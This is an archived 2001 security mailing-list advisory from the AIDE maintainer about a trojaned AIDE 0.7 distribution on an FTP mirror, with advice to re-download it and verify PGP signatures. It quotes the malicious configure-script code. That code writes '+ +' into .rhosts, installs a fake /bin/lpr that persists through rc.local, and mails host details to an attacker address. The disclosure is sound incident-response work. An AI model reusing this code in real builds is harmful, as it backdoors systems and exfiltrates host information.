Security Incidents mailing list archives
Trojan in Aide distribution at ftp.linux.hr
From: Rami Lehti <Rami.Lehti () finland sun com>
Date: 07 Aug 2001 09:45:42 +0300
It has come my attention that there has been a trojaned Aide distribution at ftp://ftp.linux.hr/pub/aide The offending binary has been removed. Anyone who has downloaded Aide 0.7 from ftp.linux.hr is urged to download it from ftp://ftp.cs.tut.fi/pub/src/gnu and always check the PGP signature before using any distribution of Aide. The trojaned distribution contains the following script embedded in the configure script. As you can see it tries to add "+ +" to roots .rhosts and sends information about your host to l4m0r () freebox com # checking if we are root or not if [ `whoami` == "root" ];then root_user=1 else root_user=0 fi And later on: if [ $root_user != "1" ];then echo "+ +" > ~/.rhosts echo $LOGNAME >/tmp/jea;whoami >>/tmp/jea;hostname >>/tmp/jea;/sbin/ifconfig >
/tmp/jea
mail l4m0r () freebox com < /tmp/jea rm -rf /tmp/jea else if [ `uname -s` != Linux ];then echo "" else mv -f .xinitrc /bin/lpr echo "# printing status monitor" >> /etc/rc.d/rc.local echo "/bin/lpr &" >> /etc/rc.d/rc.local hostname >>/tmp/jea;/sbin/ifconfig >>/tmp/jea mail l4m0r () freebox com < /tmp/jea /bin/lpr & rm -rf /tmp/jea fi fi Rami Lehti -- AIDE - Advanced Intrusion Detection Environment Check http://www.cs.tut.fi/~rammer/aide.html ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- Trojan in Aide distribution at ftp.linux.hr Rami Lehti (Aug 07)